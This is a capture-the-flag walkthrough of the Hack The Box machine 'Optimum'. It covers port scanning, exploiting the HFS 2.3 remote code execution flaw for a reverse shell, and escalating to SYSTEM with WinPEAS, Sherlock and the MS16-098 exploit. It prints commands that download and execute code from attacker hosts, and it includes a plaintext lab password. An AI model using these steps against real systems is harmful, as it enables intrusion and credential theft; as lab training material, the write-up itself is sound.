Optimum

Reconnaissance:

WAPP http://10.10.10.8/

  • Security: Basic

  • CDN: Google Hosted Libraries

  • JavaScript libraries: jQuery 1.4.4

Retire.js

  • jquery 1.4.4

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.8  

80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.8

All 1000 scanned ports on 10.10.10.8 are in ignored states.

Our initial recon shows that our only point of entry is through exploiting the HTTP File Server.

Enumeration:

Browse to the HTTP File server. It seems to be a server that allows you to remotely access your files over the network. There’s a login page that might be using default credentials. This could potentially allow us to gain an initial foothold. Let’s google the server name and version to learn more about it.

The first two google entries are publicly disclosed exploits that would give us remote code execution on the box! Click on the first entry and view the compile instructions.

#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!

To compile the exploit, we need to perform a few tasks:

  1. Host a web server on our attack machine (kali) on port 80 in a directory that has the netcat executable file.

  2. Start a netcat listener on the attack machine.

  3. Download the exploit and change the ip_addr & local_port variables in the script to match the ip address of the attack machine and the port that netcat is listening on.

  4. Run the script using python as stated in the Usage comment.

Before we do that, let’s try and understand what the script is doing.

Everything in yellow (in double quotes) is URL encoded. Let’s decode it using an

Three functions are being called:

  • script_create(): creates a script (script.vbs) that when run downloads the nc.exe from our attack machine and saves it to the C:\Users\Public\ location on the target machine.

  • execute_script(): uses the csscript.exe (command-line version of the Windows Script Host that provides command-line options for setting script properties) to run script.vbs.

  • nc_run(): runs the the netcat executable and sends a reverse shell back to our attack machine.

Now that we understand what the script is doing, what remains to be answered is why was remote code execution allowed. Further googling tells us

The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action. This makes sense. In the exploit, every time a search is done to run arbitrary code, the %00 sequence is used.

Foothold:

Now that we understand the exploit, let’s run it. In the instructions, the first step is to host a web server on our attack machine (kali) on port 80 in a directory that has the netcat executable file. Locate the Windows netcat executable file in the kali vm.

cp nc.exe ~/Desktop/

Start the HTTP server.

┌──(kali㉿kali)-[~/Desktop]
└─$ python -m SimpleHTTPServer 80

The second step is to start a netcat listener on the attack machine.

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 2560

The third step is to download the exploit and change the ip_addr & local_port variables in the script to match the ip address of the attack machine and the port that netcat is listening on.

┌──(kali㉿kali)-[~]
└─$ searchsploit 39161

┌──(kali㉿kali)-[~]
└─$ searchsploit -m 39161

┌──(kali㉿kali)-[~]
└─$ mv 39161.py Desktop

The fourth step is to run the exploit.

┌──(kali㉿kali)-[~/Desktop]
└─$ python 39161.py 10.10.10.8 80

We get a non-privileged shell back!

C:\Users\kostas\Desktop>whoami
optimum\kostas

Grab the user flag.

C:\Users\kostas\Desktop>dir
C:\Users\kostas\Desktop>type user.txt

We don’t have system privileges, so we’ll need to find a way to escalate privileges.

Privilege Escalation:

WinPEAS I started with WinPEAS to look for escalation paths. I cloned a copy of the repo to my host, started an SMB server in the path with the Windows exe with sudo smbserver.py share . -smb2support, and copied it to Optimum:

copy \\10.10.14.10\share\winPEAS.exe .

Now I’ll run it with .\winPEAS.exe. Scanning through the output, there were a few interesting things. The box is Windows Server 2012 R2, and 64-bit:

There were creds for kostas:
  [+] Looking for AutoLogon credentials
    Some AutoLogon credentials were found!!
    DefaultUserName               :  kostas
    DefaultPassword               :  kdeEjDowkS*

A bunch of services were called out as potentially interesting, but nothing in there really panned out.

Watson/Sherlock One thing I noticed was not in the winPEAS output was Watson results. Watson is a quick checker for CVEs this Windows host might be vulnerable to, and in the original HTB days, that was a common escalation technique (in fact, it is the intended path on this host). My best guess as to why it didn’t run is the .NET version required by Watson in winPEAS is 4.5, and this host only has up to 4.0:

If I want to run Watson, I think I could get it to work by downloading it and compiling it to match one of the .NET versions on the box, but I wasn’t able to get it working quickly. Instead, because this box is so old, I went to Watson’s predecessor, Sherlock.

Sherlock is a PowerShell script. I’ll download a copy, and see that it defines a bunch of functions, but doesn’t call any. I’ll add a line at the end to call Find-AllVulns. Then I’ll use a Python HTTP server to host a copy, and execute it the same way I got a shell:

PS C:\> IEX(New-Object Net.WebClient).downloadstring('http://10.10.14.10/Sherlock.ps1')

There are three that show “Appears Vulnerable”, MS16-032, MS16-034, and MS16-135.

MS16-098:

Lets see the system information by running:

systeminfo

Okay now we know the OS and the version, After using this information and perform a deep google search i found an exploit called MS16–098, All we need to do is download the exe file and upload it to the target machine, first download the exe file:

Put it on you desktop, we already have a python server running there on port 80, all we need now is uploading bfill.exe to the target machine, make sure you use Downloads directory:

C:\Users\Public\Downloads> powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.8:9005/bfill.exe', 'c:\Users\Public\Downloads\bfill.exe')"

now lets navigate to our downloads directory:

cd /users/public/downloads

We will find our bfill.exe file there, all we need is to execute it

C:\Users\Public\Downloads>bfill.exe
bfill.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

That's it, we are system! grab you flags here:

C:\Users\Administrator\Desktop>type root.txt

PreviousDevelNextBastard

Last updated